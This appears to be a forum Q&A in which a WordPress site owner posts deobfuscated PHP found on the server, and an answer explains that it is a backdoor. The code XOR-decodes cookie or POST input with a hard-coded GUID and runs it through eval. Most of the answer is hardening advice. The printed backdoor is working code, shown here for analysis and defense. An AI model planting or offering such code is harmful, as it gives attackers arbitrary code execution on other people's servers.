# What does this (virus?) code do?

Tags: php, wordpress, virus

I found some code that I did not write in my public_html folder on my WordPress site. After a bit of effort, I was able to get it into a somewhat readable state, but it's still beyond me what it does. Could anyone with a better understanding tell me what this code was supposed to be doing?

If it helps, it had also overwritten my index.php file with this code, as well as had several references to a strange .ico file.

```
foreach (array_merge($_COOKIE, $_POST) as $key => $value) {
    function fun1($key, $valueLength)
    {
        $keyGuid = $key . "49d339b2-3813-478a-bfa1-1d75be92cf49";
        $repeatTimes = ($valueLength / strlen($key)) + 1;

        return substr(str_repeat($keyGuid, $repeatTimes), 0, $valueLength);
    }

    function packToHex($inputToPack)
    {
        return @pack("H*", $inputToPack);
    }

    function fun3($exploded)
    {
        $modCount = count($exploded) % 3;
        if (!$modCount) {
            eval($exploded[1]($exploded[2]));
            exit();
        }
    }

    $value = packToHex($value);
    $bitwiseXor = $value ^ fun1($key, strlen($value));
    $exploded = explode("#", $bitwiseXor);
    fun3($exploded);
}
```

Answer (score 2):

Short answer: It is backdoor, it allows to execute arbitrary code on the server side.

Note: all you *need* to see is that it has `eval` and takes input from the user.

What arbitrary code? Whatever they want.

---

Long answer:

It will take data from `$_COOKIE` and `$_POST` as you can see. This data comes from the user. We can infer that this code was designed for a malicius user recieve data (which, either the malicius user will send directly, or via a bot).

What does it dose with this data? Well, it will over all the input, one by one, and try to:

- `$value = packToHex($value);` Interpret it as an hexadecimal string and covert it to its binary representation. Silently fail if it isn't an hexadecimal string.
- `$bitwiseXor = $value ^ fun1($key, strlen($value));` apply a cheap cipher over it. This is a symetric substitution cipher, it depends on `$key` and the hard coded guid `49d339b2-3813-478a-bfa1-1d75be92cf49`. We can asume that who injected this code knows the guid and how to cipher for it (it is exactly the same code).
- `$exploded = explode("#", $bitwiseXor);` We then separate the result by the character `"#"`.
- And `fun3($exploded);` interpret it as code (see `[eval][1]`).
- If all succedes (meaning that the  input from the user was such that it triggered this process), then it will exit, so that it flow of execution never reaches your code.

---

Now, somebody injected this code *on the server*. How did they do it? I do not know.

My first guess is that you have some vulnerability that allows them to upload PHP code (perhaps you have a file upload function that will happilly take PHP files and put them in a path where the user can cause the server to run them).

Of course, there are other posibilities... they may have brute forced the login to your ftp or admin login, or some other thing that would allow them to inject the code. Or you may be running some vulnerable software (an outdated or poorly configured WordPress or plugin, for example). Perhaps you downloaded and used some library or plugin that does watherver but is compromised with malware (there have been cases). or perhaps you are using the same key as your email everywhere, and it got leaked from some other vulnerable site... or, this was done by somebody who works with you and have legitimate access, or something else entirely...

What I am saying is that... sure remove that code from your server, but know that your server is vulnerable by other means, otherwise it wouldn't have got compromised in the first place. I would assume that whoever did this is out there, and may eventually notice you took it down and compromise your server again (Addendum: In fact, there could be some other code in your server that puts it back again if it is not there).

So go cover all your bases. Change your passwords (and use strong ones). Use https. Configure your server properly. Keep your software up to date.

If you have custom PHP code: Validate all input (including file uploads). Sanitize whatever you will send back to the user. Use prepared sentences. Avoid suspicius third party code, do not copy and paste without understanding (I know you can do a lot without really understanding how it works, but when it fails is when you *really* need the knowledge).

Addendum:

- If you can, automate updates and backups.
- Yes, there are security plugins for WordPress, and those can go a long way in improving its security. However, you can always configure them wrong.